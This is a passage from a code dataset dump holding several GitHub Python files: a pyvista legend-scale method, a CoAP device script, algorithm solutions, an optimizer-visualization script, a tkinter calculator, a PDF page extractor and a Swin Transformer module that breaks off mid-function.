number_minor_ticks=0,\n tick_length=5,\n minor_tick_length=3,\n show_ticks=True,\n tick_label_offset=2,\n ):\n \"\"\"Annotate the render window with scale and distance information.\n\n Its basic goal is to provide an indication of the scale of the scene.\n Four axes surrounding the render window indicate (in a variety of ways)\n the scale of what the camera is viewing. An option also exists for\n displaying a scale legend.\n\n Parameters\n ----------\n corner_offset_factor : float, default: 2.0\n The corner offset value.\n\n bottom_border_offset : int, default: 30\n Bottom border offset. Recommended value ``50``.\n\n top_border_offset : int, default: 30\n Top border offset. Recommended value ``50``.\n\n left_border_offset : int, default: 30\n Left border offset. Recommended value ``100``.\n\n right_border_offset : int, default: 30\n Right border offset. Recommended value ``100``.\n\n bottom_axis_visibility : bool, default: True\n Whether the bottom axis is visible.\n\n top_axis_visibility : bool, default: True\n Whether the top axis is visible.\n\n left_axis_visibility : bool, default: True\n Whether the left axis is visible.\n\n right_axis_visibility : bool, default: True\n Whether the right axis is visible.\n\n legend_visibility : bool, default: True\n Whether the legend scale is visible.\n\n xy_label_mode : bool, default: False\n The axes can be programmed either to display distance scales\n or x-y coordinate values. By default,\n the scales display a distance. However, if you know that the\n view is down the z-axis, the scales can be programmed to display\n x-y coordinate values.\n\n render : bool, default: True\n Whether to render when the actor is added.\n\n color : ColorLike, optional\n Either a string, rgb list, or hex color string for tick text\n and tick line colors.\n\n .. warning::\n The axis labels tend to be either white or black.\n\n font_size_factor : float, default: 0.6\n Factor to scale font size overall.\n\n label_size_factor : float, default: 1.0\n Factor to scale label size relative to title size.\n\n label_format : str, optional\n A printf style format for labels, e.g. ``'%E'``.\n See :ref:`old-string-formatting`.\n\n number_minor_ticks : int, default: 0\n Number of minor ticks between major ticks.\n\n tick_length : int, default: 5\n Length of ticks in pixels.\n\n minor_tick_length : int, default: 3\n Length of minor ticks in pixels.\n\n show_ticks : bool, default: True\n Whether to show the ticks.\n\n tick_label_offset : int, default: 2\n Offset between tick and label in pixels.\n\n Returns\n -------\n vtk.vtkActor\n The actor for the added ``vtkLegendScaleActor``.\n\n Warnings\n --------\n Please be aware that the axes and scale values are subject to perspective\n effects. The distances are computed in the focal plane of the camera. When\n there are large view angles (i.e., perspective projection), the computed\n distances may provide users the wrong sense of scale. 
These effects are not\n present when parallel projection is enabled.\n\n Examples\n --------\n >>> import pyvista as pv\n >>> cone = pv.Cone(height=2.0, radius=0.5)\n >>> pl = pv.Plotter()\n >>> _ = pl.add_mesh(cone)\n >>> _ = pl.add_legend_scale()\n >>> pl.show()\n\n \"\"\"\n color = Color(color, default_color=self._theme.font.color)\n\n legend_scale = _vtk.vtkLegendScaleActor()\n legend_scale.SetCornerOffsetFactor(corner_offset_factor)\n legend_scale.SetLegendVisibility(legend_visibility)\n if xy_label_mode:\n legend_scale.SetLabelModeToXYCoordinates()\n else:\n legend_scale.SetLabelModeToDistance()\n legend_scale.SetBottomAxisVisibility(bottom_axis_visibility)\n legend_scale.SetBottomBorderOffset(bottom_border_offset)\n legend_scale.SetLeftAxisVisibility(left_axis_visibility)\n legend_scale.SetLeftBorderOffset(left_border_offset)\n legend_scale.SetRightAxisVisibility(right_axis_visibility)\n legend_scale.SetRightBorderOffset(right_border_offset)\n legend_scale.SetTopAxisVisibility(top_axis_visibility)\n legend_scale.SetTopBorderOffset(top_border_offset)\n\n for text in ['Label', 'Title']:\n prop = getattr(legend_scale, f'GetLegend{text}Property')()\n if color != Color('white'):\n # This property turns black if set\n prop.SetColor(*color.int_rgb)\n prop.SetFontSize(\n int(font_size_factor * 20)\n ) # hack to avoid multiple font size arguments\n\n for ax in ['Bottom', 'Left', 'Right', 'Top']:\n axis = getattr(legend_scale, f'Get{ax}Axis')()\n axis.GetProperty().SetColor(*color.int_rgb)\n if color != Color('white'):\n # This label property turns black if set\n axis.GetLabelTextProperty().SetColor(*color.int_rgb)\n axis.SetFontFactor(font_size_factor)\n axis.SetLabelFactor(label_size_factor)\n if label_format:\n axis.SetLabelFormat(label_format)\n axis.SetNumberOfMinorTicks(number_minor_ticks)\n axis.SetTickLength(tick_length)\n axis.SetMinorTickLength(minor_tick_length)\n axis.SetTickVisibility(show_ticks)\n axis.SetTickOffset(tick_label_offset)\n\n return self.add_actor(\n legend_scale,\n reset_camera=False,\n name='_vtkLegendScaleActor',\n culling=False,\n pickable=False,\n render=render,\n )\n\n\ndef _line_for_legend():\n \"\"\"Create a simple line-like rectangle for the legend.\"\"\"\n points = [\n [0, 0, 0],\n [0.4, 0, 0],\n [0.4, 0.07, 0],\n [0, 0.07, 0],\n [\n 0.5,\n 0,\n 0,\n ], # last point needed to expand the bounds of the PolyData to be rendered smaller\n ]\n legendface = pyvista.PolyData()\n legendface.points = np.array(points)\n legendface.faces = [4, 0, 1, 2, 3]\n return legendface\n","repo_name":"pyvista/pyvista","sub_path":"pyvista/plotting/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":125809,"program_lang":"python","lang":"en","doc_type":"code","stars":2055,"dataset":"github-code","pt":"76"} +{"seq_id":"17001617103","text":"'''\nAuthor: lenzo\nDate: 2021-08-19 09:34:37\nLastEditTime: 2021-08-20 10:11:06\nLastEditors: Please set LastEditors\nDescription: device部分\nFilePath: \\CoAP-MQTT-brige\\device.py\n'''\nfrom coapserver import server\nfrom coapBasic import CoapBasicServer,CoapbasicClient\n\nclass Device(CoapbasicClient,CoapBasicServer):\n def __init__(self,serverAddr='127.0.0.1',serverPort = 5683,clientAddr = '127.0.0.1',clientPort = 5683):\n CoapbasicClient.__init__(self,clientAddr,clientPort)\n CoapBasicServer.__init__(self,serverAddr,serverPort)\n\nif __name__=='__main__':\n\n d = Device(serverPort=5684)\n d.connectServer()\n d.putLoop('Temperature', '27', 5)\n\n d.setServer()\n d.add_resource('TemperatureController')\n 
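# Note (illustrative aside, not part of the original record): the Device class
# above initializes each base explicitly — CoapbasicClient.__init__ and
# CoapBasicServer.__init__ — rather than relying on super() and the MRO.
# A generic sketch of that pattern, with hypothetical stand-in classes:
#
#     class Client:
#         def __init__(self, addr): self.addr = addr
#     class Server:
#         def __init__(self, port): self.port = port
#     class Node(Client, Server):
#         def __init__(self, addr, port):
#             Client.__init__(self, addr)   # call each base explicitly
#             Server.__init__(self, port)
#
# Explicit base calls are the usual choice when the bases take different
# constructor arguments, as the client and server bases do here.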
d.serverStart()","repo_name":"amazingapple5/CoAP-MQTT-brige","sub_path":"device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6517834302","text":"class Solution:\n # @param {string} s\n # @param {string} t\n # @return {integer}\n def numDistinct(self, s, t):\n if len(s) < len(t):\n return 0\n if t == \"\":\n return 1\n \n dp = [ [0 for j in range(len(t))] for j in range(len(s)) ]\n dp[0][0] = 1 if s[0]==t[0] else 0\n \n for i in range( 1, len(s) ):\n j = 0\n while j <= i and j < len(t):\n dp[i][j] = dp[i-1][j]\n if s[i] == t[j]:\n dp[i][j] += dp[i-1][j-1] if j > 0 else 1\n j+=1\n\n return dp[len(s)-1][len(t)-1]\n\n\n\n\n\n","repo_name":"thisismonica/leetcode","sub_path":"distinct_subsequences.py","file_name":"distinct_subsequences.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"40274267700","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\n\nfrom optimizers import SGD, Momentum, AdaGrad, AdaDelta, RMSprop, Adam, AMSGrad, Nadam\n# put desired test function name here\nfrom test_functions import Booth as Func\n\n\n# Optimizers\n# lr = df.loc[Opt(func, 0).name, func.name]\noptimizers = {\n\t'SGD': SGD(Func(), lr=0.003),\n\t'Momentum': Momentum(Func(), lr=0.003, momentum=0.9),\n\t'AdaGrad': AdaGrad(Func(), lr=0.5, eps=1e-3),\n\t'AdaDelta': AdaDelta(Func(), lr=0.99, eps=1e-3),\n\t'RMSprop': RMSprop(Func(), lr=0.05, gamma=0.99, eps=1e-8),\n\t'Adam': Adam(Func(), lr=0.5, b1=0.9, b2=0.99, eps=1e-8),\n\t'AMSGrad': AMSGrad(Func(), lr=0.5, b1=0.9, b2=0.88, eps=1e-8),\n\t'Nadam': Nadam(Func(), lr=0.5, b1=0.9, b2=0.99, eps=1e-8),\n}\n\n\nopts = ['SGD', 'Momentum', 'AdaGrad', 'AdaDelta', 'RMSprop', 'Adam', 'AMSGrad', 'Nadam']\n# opts = ['AdaDelta']\nfor o in opts:\n\tfig = plt.figure()\n\tfunc = Func()\n\tif func.name == \"Rosenbrock\":\n\t\tX = np.arange(-4,3.1,0.1)\n\t\tY = np.arange(-2,4.1,0.1)\n\t\tax = plt.axes(xlim=(-4, 3), ylim=(-2, 4))\n\t\tx0 = -2\n\t\ty0 = -1\n\telif func.name == \"Himmelblau\":\n\t\tX = np.arange(-5,5.1,0.1)\n\t\tY = np.arange(-5,5.1,0.1)\n\t\tax = plt.axes(xlim=(-5, 5), ylim=(-5, 5))\n\t\tx0 = 4.5\n\t\ty0 = 4.5\n\telif func.name == 'Booth':\n\t\tX = np.arange(-10,10.1,0.1)\n\t\tY = np.arange(-10,10.1,0.1)\n\t\tax = plt.axes(xlim=(-10, 10), ylim=(-10, 10))\n\t\tx0 = -9\n\t\ty0 = -9\n\tX, Y = np.meshgrid(X, Y)\n\tZ = func.f(X, Y)\n\n\t# Contour of test function\n\tax.contourf(X, Y, Z, 100, cmap='viridis')\n\tax.plot(func.minima[0][0], func.minima[0][1], 'ro', label='Minima')\n\tfor i in range(1, len(func.minima)):\n\t\tax.plot(func.minima[i][0], func.minima[i][1], 'ro')\n\n\n\tdef init():\n\t\tpoint.set_data([], [])\n\t\tstep_text.set_text('')\n\t\tvalue_text.set_text('')\n\t\tgrad_text.set_text('')\n\t\treturn point, step_text, value_text, grad_text\n\tdef animate(i):\n\t\tglobal p\n\t\tpoint.set_data(p[i-1][0], p[i-1][1])\n\t\tstep_text.set_text(f'step: {i}')\n\t\tvalue_text.set_text(f'z: {func.f(p[i-1][0], p[i-1][1]):.3f}')\n\t\tdf = func.df(p[i-1][0], p[i-1][1])\n\t\tgrad_text.set_text(f'grad: ({df[0]:.3f}, {df[1]:.3f})')\n\t\treturn point, step_text, value_text\n\n\n\topt = optimizers[o]\n\tp = []\n\tpoint, = ax.plot([], [], 'yo', label=opt.name)\n\tstep_text = ax.text(0.02, 0.95, '', c='white', transform=ax.transAxes)\n\tvalue_text = ax.text(0.02, 0.91, '', c='white', 
transform=ax.transAxes)\n\tgrad_text = ax.text(0.02, 0.87, '', c='white', transform=ax.transAxes)\n\tp.append(opt.step(x0, y0))\n\tN = 300\n\tfor i in range(1, N):\n\t\tp.append(opt.step(p[i-1][0], p[i-1][1]))\n\n\tplt.legend(loc='lower right')\n\ttry:\n\t\tos.mkdir(f'test_gifs/{func.name}/')\n\texcept Exception as e:\n\t\tpass\n\tanim = animation.FuncAnimation(fig, animate, init_func=init, frames=N, blit=True)\n\tprint(f'Writing to test_gifs/'+func.name+'/'+opt.name+'.gif')\n\tanim.save('test_gifs/'+func.name+'/'+opt.name+'.gif', writer='imagemagick', fps=60)\n\n\t# ax.plot(p[-1][0],p[-1][1],'yo')\n\n\n\t# plt.show()\n","repo_name":"hoangminhquan-lhsdt/optimizers","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"26911278366","text":"import numpy as np\nimport os\n\ndef reward2step(plot_reward, max_episode_length):\n # plot_reward.shape=[steps_num]\n plot_steps = max_episode_length * np.ones(plot_reward.shape)\n cum_rewards = plot_reward[max_episode_length:] - plot_reward[:-max_episode_length]\n plot_steps[max_episode_length:] = max_episode_length / cum_rewards\n plot_steps[np.isinf(plot_steps)] = max_episode_length\n return plot_steps\n\n# def reward2step(plot_reward, max_episode_length):\n# # plot_reward.shape=[tasks_num, trails_num, steps_num]\n# tasks_num, trails_num, steps_num = plot_reward.shape\n# plot_steps = max_episode_length * np.ones(plot_reward.shape)\n#\n# for task_id in range(tasks_num):\n# for trail_id in range(trails_num):\n# cum_rewards = plot_reward[task_id, trail_id, max_episode_length:] - plot_reward[task_id, trail_id, :-max_episode_length]\n# plot_steps[task_id, trail_id, max_episode_length:] = max_episode_length / cum_rewards\n# one_dim_steps = plot_steps[task_id,trail_id,:]\n# one_dim_steps[np.isinf(one_dim_steps)] = max_episode_length\n# plot_steps[task_id,trail_id, :] = one_dim_steps\n# return plot_steps\n\n\nif __name__ == '__main__':\n projectDir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))\n\n data_path = os.path.join(projectDir, 'lifelong_rl_with_rm_data', \"minecraft\", \"reward(2021)\")\n zip_data_path = os.path.join(projectDir, 'lifelong_rl_with_rm_data', \"minecraft\", \"steps(2021)\")\n\n for algorithm in [\"QRM\", \"QRMrs\", \"TQRMbest\", \"TQRMworst\"]:\n data_reward = np.load(os.path.join(data_path, algorithm+\"norm.npy\"))\n tasks_num, trails_num, steps_num = data_reward.shape\n data_step = np.zeros(data_reward.shape)\n for task_id in range(tasks_num):\n for trail_id in range(trails_num):\n data_step[task_id,trail_id] = reward2step(data_reward[task_id,trail_id], 500)\n # zip_data = data_step[:,:,::100]\n zip_data = data_step\n np.save(os.path.join(zip_data_path, algorithm+\"norm.npy\"), zip_data)\n","repo_name":"zhengxj28/lifelong_rl_with_rm","sub_path":"src/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42172380186","text":"N = int(input())\nS = input()\n\nans = []\nfor i in range(1, N):\n a = 0\n for k in range(N - i):\n if S[k] == S[k + i]: break\n a += 1\n\n ans.append(a)\n\nfor a in ans:\n print(a)\n","repo_name":"ymtz13/CompetitiveProgramming","sub_path":"AtCoder/ABC285/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 
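The reward2step helper in the data_process.py record above turns a cumulative-reward curve into an estimated steps-per-episode curve: over any window of max_episode_length steps, the reward gained equals the number of episodes completed, so window / reward_gained is the mean episode length. A minimal numeric check of that identity (hypothetical data; assumes only numpy — an illustration, not part of the dataset):

    import numpy as np

    k, W = 25, 100                            # true episode length, window size
    r = (np.arange(500) // k).astype(float)   # cumulative reward: +1 every k steps
    est = W / (r[W:] - r[:-W])                # windowed steps-per-episode estimate
    print(est[100])                           # -> 25.0, recovering k

The np.isinf guard in the original handles windows in which no episode finished (zero reward gained), clamping the estimate to max_episode_length.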
+{"seq_id":"15176879744","text":"import tkinter as tk\nwindow=tk.Tk()\nwindow.title('Calculator')\nwindow.iconbitmap('calc.ico')\nwindow.geometry('455x575')\nwindow.configure(bg='#0fe9a0')\nwindow.resizable(width=False,height=False)\nexpression=''\nans=0\ndef press(num):\n global expression\n expression = expression+str(num)\n equation.set(expression)\ndef clear():\n global expression\n expression=''\n equation.set(expression)\n equation.set('0')\ndef equalpress():\n global expression\n global ans\n try:\n equation.set(str(eval(expression)))\n expression=str(eval(expression))\n ans=eval(expression)\n expression=''\n except:\n equation.set('error')\n expression=''\ndef backspace():\n global expression\n try:\n expression=expression[0:(len(expression)-1)]\n if len(expression)>0:\n equation.set(expression)\n else:\n equation.set(0)\n except:\n pass\nbuttonframe=tk.Frame(master=window,bg='#0fe9a0')\n\nequation=tk.StringVar()\nequation.set('0')\n\n\nentrybox= tk.Entry(master=buttonframe,justify='right',textvariable= equation,font=('arial',20,'bold'))\nbutton1=tk.Button(master=buttonframe, text='1',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(1))\nbutton2=tk.Button(master=buttonframe, text='2',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(2))\nbutton3=tk.Button(master=buttonframe, text='3',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(3))\nbutton4=tk.Button(master=buttonframe, text='4',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(4))\nbutton5=tk.Button(master=buttonframe, text='5',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(5))\nbutton6=tk.Button(master=buttonframe, text='6',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(6))\nbutton7=tk.Button(master=buttonframe, text='7',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(7))\nbutton8=tk.Button(master=buttonframe, text='8',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(8))\nbutton9=tk.Button(master=buttonframe, text='9',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(9))\nbutton0=tk.Button(master=buttonframe, text='0',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(0))\nbuttonplus=tk.Button(master=buttonframe, text='+',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('+'))\nbuttonminus=tk.Button(master=buttonframe, text='-',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('-'))\nbuttonmult=tk.Button(master=buttonframe, text='x',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('*'))\nbuttonpoint=tk.Button(master=buttonframe, text='.',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('.'))\nbuttondiv=tk.Button(master=buttonframe, text='/',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press('/'))\nbuttonclear=tk.Button(master=buttonframe, text='C',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:clear())\nbuttonequal=tk.Button(master=buttonframe, 
text='=',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=17,height=3,command=lambda:equalpress())\nbuttonbs=tk.Button(master=buttonframe, text='<-',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:backspace())\nbuttonans=tk.Button(master=buttonframe, text='Ans',font=('times new roman',12),relief='ridge',bd=1,bg='#b8fee6',width=8,height=3,command=lambda:press(ans))\n\nbuttonframe.pack()\nentrybox.grid(row=0,column=0,columnspan=4,pady=15,ipadx=8,ipady=25)\nbutton1.grid(row=1,column=0)\nbutton2.grid(row=1,column=1)\nbutton3.grid(row=1,column=2)\nbuttonplus.grid(row=1,column=3)\nbutton4.grid(row=2,column=0)\nbutton5.grid(row=2,column=1)\nbutton6.grid(row=2,column=2)\nbuttonminus.grid(row=2,column=3)\nbutton7.grid(row=3,column=0)\nbutton8.grid(row=3,column=1)\nbutton9.grid(row=3,column=2)\nbuttonmult.grid(row=3,column=3)\nbuttonpoint.grid(row=4,column=0)\nbutton0.grid(row=4,column=1)\nbuttonclear.grid(row=4,column=2)\nbuttondiv.grid(row=4,column=3)\nbuttonbs.grid(row=5,column=3)\nbuttonans.grid(row=5,column=2)\nbuttonequal.grid(row=5,column=0,columnspan=2)\n\n\n\nwindow.mainloop()\n","repo_name":"kelvindoe22/Python_beginner_projects","sub_path":"calc2.py","file_name":"calc2.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24138117015","text":"import glob\nimport PyPDF2 as pdf\nimport datetime\nimport pandas as pd\n\ncsvName = input('Enter csv file name: ')\n\ndt = datetime.datetime.now()\nfileN = dt.strftime('%Y%m%d_%H%M%S') + 'csvOf.pdf'\n\nd = pd.read_csv('./data/' + csvName, header=None)\n\nwriter = pdf.PdfWriter()\nfiles = glob.glob('./data/*.pdf')\n\nfor i in range(len(files)):\n reader = pdf.PdfReader(files[i])\n\n for l in range(0, len(reader.pages)):\n if (l+1) in d.values:\n page = reader.pages[l]\n writer.add_page(page)\n \nwith open(fileN, 'wb') as f:\n writer.write(f)\n \n","repo_name":"ducksfrogs/ICTuse","sub_path":"pdf_printPJ/printCSVinput.py","file_name":"printCSVinput.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30374284915","text":"import glob\nimport importlib\nimport inspect\nimport logging\nimport re\nimport scandir\nimport pathlib\n\nimport click\n\nfrom collections import defaultdict\nfrom os import path\nfrom typing import Callable, Generator\n\nlogger = logging.getLogger(__name__)\n\n\nPY_FILE_REGEXP = re.compile(r'[a-z_]\\w*.py$')\nPY_FILE_PUBLIC = re.compile(r'[a-z]\\w*.py$') # only \"public modules\" here\n\n\ndef function_args(func: Callable) -> dict:\n args = inspect.getargspec(func)\n return dict(args._asdict())\n\n\ndef _is_public_function(func: Callable) -> bool:\n return inspect.isfunction(func) and not func.__name__.startswith('_')\n\n\ndef public_interface(module):\n return inspect.getmembers(module, predicate=_is_public_function)\n\n\ndef module_transform(full: str, root: str) -> str:\n rel = pathlib.Path(full).relative_to(root)\n return str(rel).replace('/', '.')[:-3]\n\n\ndef modules(pth: str, skip_tests: bool=True) -> Generator:\n for root, dirs, files in scandir.walk(pth):\n if not skip_tests or 'tests' not in root:\n py_files = filter(lambda v: PY_FILE_PUBLIC.match(v), files)\n for py in py_files:\n print(path.join(root, py))\n yield module_transform(path.join(root, py), pth)\n\n\ndef functions(mod_path: str, root: str) -> Generator:\n mod = module_transform(mod_path, root)\n 
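# Note (illustration, not part of the original record): module_transform above
# converts a file path into a dotted module name by taking the path relative to
# the root, replacing '/' with '.', and slicing off the trailing '.py':
#
#     str(pathlib.Path('/src/pkg/mod.py').relative_to('/src')).replace('/', '.')[:-3]
#     -> 'pkg.mod'
#
# (the '/src/pkg/mod.py' path is hypothetical). This assumes POSIX separators;
# on Windows the '/' replacement would not fire, so joining pathlib parts with
# '.' would be the more portable variant.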
mod_obj = importlib.import_module(mod)\n return [x[0] for x in public_interface(mod_obj)]\n\n\n@click.group()\n@click.pass_context\ndef cli(ctx):\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n\n\n@cli.command(help='report analysis')\n@click.argument('path')\n@click.pass_context\ndef report(ctx, path):\n # list of things to report that actually define a package\n # - modules\n # - functions\n # - variables\n from pprint import pprint\n","repo_name":"AndreaCrotti/breaking-changes","sub_path":"breaking_changes/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39638607318","text":"import torch\nfrom torch import nn\nimport einops\nimport numpy as np\nimport torch.nn.functional as F\nfrom timm.models.layers import DropPath, to_2tuple, trunc_normal_\n\n'''\nswin transformer\n1. Design W-MSA: attention is computed independently inside each window\n2. Design SW-MSA: shift the feature map to carve out different windows and strengthen cross-window interaction\n3. SwinTransformerBlock: use W-MSA and SW-MSA in pairs\n4. Patch Merging performs the downsampling\n5. Fully exploits shift invariance, scale invariance, and a receptive field that grows with depth\n\nIdea: CNNs learn representations with a small receptive field, while transformers learn deeper features with a global receptive field,\nso use CNNs in the shallow layers and transformers in the deep layers\n4 stages; fuse several stages? res add blocks focus fpn partial conv\n'''\n\n# reference: https://arxiv.org/pdf/2103.14030v2.pdf\n# Modify from https://github.com/microsoft/Swin-Transformer/blob/main/models/swin_transformer_v2.py\n'''\n 1. Modify the SwinTransformerBlock: add residuals and downsampling to cut the compute cost, \n 2. Align and fuse features across blocks\n'''\n\n\n# tool function\ndef window_partition(x, window_size):\n '''\n Split the input image into windows of the given size\n :param x: [b, h, w, c]\n :param window_size: window size int\n :return: [(b*h*w) window_size window_size c]\n '''\n B, H, W, C = x.shape\n x = einops.rearrange(x, 'b (h s1) (w s2) c -> b h s1 w s2 c', s1=window_size, s2=window_size)\n windows = einops.rearrange(x, 'b h s1 w s2 c -> b h w s1 s2 c')\n windows = einops.rearrange(windows, 'b h w s1 s2 c -> (b h w) s1 s2 c')\n return windows\n\ndef window_partition_official(x, window_size):\n \"\"\"\n Args:\n x: (B, H, W, C)\n window_size (int): window size\n\n Returns:\n windows: (num_windows*B, window_size, window_size, C)\n \"\"\"\n B, H, W, C = x.shape\n x = x.view(B, H // window_size, window_size, W // window_size, window_size, C)\n windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C)\n return windows\n\ndef window_reverse(windows, window_size, h, w):\n '''\n Recover the image layout from windows\n :param windows: (num_windows*b, window_size, window_size, c)\n :param window_size: int\n :param h: height of img\n :param w: width of img\n :return: [b h w c]\n '''\n b = int(windows.shape[0] / (h * w / window_size / window_size))\n x = einops.rearrange(windows, '(b h w) s1 s2 c -> b h w s1 s2 c', b=int(b), s1=window_size, s2=window_size, w=w//window_size, h=h//window_size)\n x = einops.rearrange(x, 'b h w s1 s2 c -> b (h s1) (w s2) c')\n return x\n\ndef window_reverse_offcial(windows, window_size, H, W):\n \"\"\"\n Args:\n windows: (num_windows*B, window_size, window_size, C)\n window_size (int): Window size\n H (int): Height of image\n W (int): Width of image\n\n Returns:\n x: (B, H, W, C)\n \"\"\"\n B = int(windows.shape[0] / (H * W / window_size / window_size))\n x = windows.view(B, H // window_size, W // window_size, window_size, window_size, -1)\n x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1)\n return x\n\n\nclass FeedForward(nn.Module):\n def __init__(self, in_channel, out_channel, hidden_dim, dropout=0.0):\n super(FeedForward, self).__init__()\n 
self.fc1 = nn.Linear(in_channel, hidden_dim)\n self.act = nn.GELU()\n self.fc2 = nn.Linear(hidden_dim, out_channel)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.dropout(x)\n x = self.fc2(x)\n x = self.dropout(x)\n return x\n\n\nclass PatchMerge(nn.Module):\n '''\n Acts like a downsampling step and halves the resolution.\n Compared with a max_pool + conv combination it keeps more information\n --> the focus layer in yolov5 is a similar operation\n '''\n def __init__(self, in_channel, img_size):\n super(PatchMerge, self).__init__()\n self.img_h, self.img_w = img_size\n self.in_channel = in_channel\n\n self.reduction = nn.Linear(4 * in_channel, 2 * in_channel, bias=False)\n self.norm = nn.LayerNorm(2 * in_channel)\n\n def forward(self, x):\n '''\n :param x: [b,h * w, c]\n :return: [b, l, -]\n '''\n B, L, C = x.shape\n assert L == self.img_h * self.img_w, f'x shape {x.shape} does not match'\n assert self.img_h % 2 == 0 and self.img_w % 2 == 0, 'img size should be even'\n\n x = einops.rearrange(x, 'b (h w) c -> b h w c', h=self.img_h, w=self.img_w)\n x_0 = x[:, 0::2, 0::2, :]\n x_1 = x[:, 1::2, 0::2, :]\n x_2 = x[:, 0::2, 1::2, :]\n x_3 = x[:, 1::2, 1::2, :]\n x = torch.cat([x_0, x_1, x_2, x_3], -1)\n x = einops.rearrange(x, 'b h w c -> b (h w) c', c=C * 4)\n x = self.reduction(x)\n x = self.norm(x)\n\n return x\n\nclass PatchEmbed(nn.Module):\n def __init__(self, in_channel, embed_dim=96, img_size=224, patch_size=4):\n super(PatchEmbed, self).__init__()\n img_size = to_2tuple(img_size)\n patch_size = to_2tuple(patch_size)\n patches_resolution = [img_size[0] // patch_size[0], img_size[1] // patch_size[1]]\n self.img_size = img_size\n self.patch_size = patch_size\n self.patch_resolution = patches_resolution\n self.num_pathch = patches_resolution[0] * patches_resolution[1]\n\n self.in_channel = in_channel\n self.embed_dim = embed_dim\n\n self.proj = nn.Conv2d(in_channel, embed_dim,kernel_size=patch_size, stride=patch_size)\n self.norm_layer = nn.LayerNorm(embed_dim)\n\n def forward(self, x):\n B, C, H, W = x.shape\n assert H == self.img_size[0] and W == self.img_size[1]\n x = self.proj(x).flatten(2).transpose(1, 2) # [b, ph*pw, c]\n x = self.norm_layer(x)\n\n return x\n\n\nclass WindowAttentionV2(nn.Module):\n '''\n W-MSA with relative position encoding, built on top of standard multi-head attention (MHA)\n '''\n def __init__(self, in_channel, window_size, num_heads, qkv_bias=True, attn_drop=0.0, proj_drop=0.0, pretrain_window_size=[0, 0]):\n super(WindowAttentionV2, self).__init__()\n self.in_channel = in_channel\n self.img_h, self.img_w = window_size # (window_h, window_w)\n self.window_size = window_size\n self.num_heads = num_heads\n self.head_dim = in_channel // num_heads\n self.scale = self.head_dim ** -0.5\n\n # relative position part\n # copy from https://github.com/microsoft/Swin-Transformer/blob/main/models/swin_transformer_v2.py#L113\n self.logit_scale = nn.Parameter(torch.log(10 * torch.ones((num_heads, 1, 1))), requires_grad=True)\n # relative position bias\n self.position_bias = nn.Sequential(\n nn.Linear(2, 512, bias=True),\n nn.ReLU(inplace=True),\n nn.Linear(512, num_heads, bias=False)\n )\n\n # relative_coords_table\n relative_coords_h = torch.arange(-(self.window_size[0] - 1), self.window_size[0], dtype=torch.float32)\n relative_coords_w = torch.arange(-(self.window_size[1] - 1), self.window_size[1], dtype=torch.float32)\n\n relative_coords_table = torch.stack(\n torch.meshgrid(\n [relative_coords_h, relative_coords_w]\n )\n ).permute(1, 2, 0).contiguous().unsqueeze(0) #-> [1, 2*win_h-1, 2*win_w-1, 2]\n\n if pretrain_window_size[0] > 0:\n relative_coords_table[:, :, :, 0] /= (pretrain_window_size[0] - 1)\n 
